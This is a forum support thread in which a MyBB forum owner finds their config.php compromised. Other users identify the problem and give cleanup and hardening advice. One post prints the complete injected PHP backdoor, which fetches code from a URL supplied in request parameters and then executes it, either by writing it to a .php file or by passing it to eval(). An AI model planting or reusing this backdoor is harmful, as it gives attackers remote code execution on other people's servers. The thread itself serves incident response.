2011-10-17, 05:03 AM
Pages: 1 2
2011-10-17, 05:53 AM
open the config.php file and check any vulnerability script added inside it...
i belief after few more blank lines there may be vulnerable code passing you information
check out the post
http://community.mybb.com/thread-105780-...#pid772311
i belief after few more blank lines there may be vulnerable code passing you information
check out the post
http://community.mybb.com/thread-105780-...#pid772311
2011-10-17, 08:37 AM
You should also check with your host as some hosts automatically lower the chmods of files that are chmoded to 777.
2011-10-17, 03:42 PM
This was in the config.php file :
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '5c971edc0b2cc92fc99b5a3609450cb7'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
2011-10-17, 04:06 PM
EDIT: I've just read your last post now... your file was seriously modified http://wiki.mybb.com/index.php/Inc/config.php
---------------------
I think it's a HOST action, too.
I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default to other files is 0755
Anyway if \inc\config.php is not writable it's a good think to your security, I see that warning in Maintenance under AdminCP and don't give a orange to it
To increase security you can add in your-forum-url/inc/ this:
File: /inc/.htaccess
---------------------
I think it's a HOST action, too.
I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default to other files is 0755
Anyway if \inc\config.php is not writable it's a good think to your security, I see that warning in Maintenance under AdminCP and don't give a orange to it
To increase security you can add in your-forum-url/inc/ this:
File: /inc/.htaccess
<files config.php>
Order allow,deny
Deny from all
</files>
<files .htaccess>
Order allow,deny
Deny from all
</files>
2011-10-17, 04:08 PM
That's injection code. You're compromised.
2011-10-17, 04:18 PM
What shall I do ?
2011-10-17, 04:27 PM
Delete the code, or just download and re-upload the most recent version of MyBB.
2011-10-17, 04:31 PM
(2011-10-17, 04:27 PM)Paul H. Wrote: [ -> ]Delete the code, or just download and re-upload the most recent version of MyBB.
wont include config.php though, so upload all new MyBB code (download it again from the site today) and then upload it all.
clean up existing config.php
delete settings.php and let myBB recreate it.
secure your site, change passwords, run security checks on templates, browse your site's file system for odd files you dont recognize, etc.
2011-10-17, 04:44 PM
My guess is that you should have an expert fix and secure this for you. It's likely that it's all backdoored and unless you're thorough to remove every trace of the exploit you'll just be compromised again.
Pages: 1 2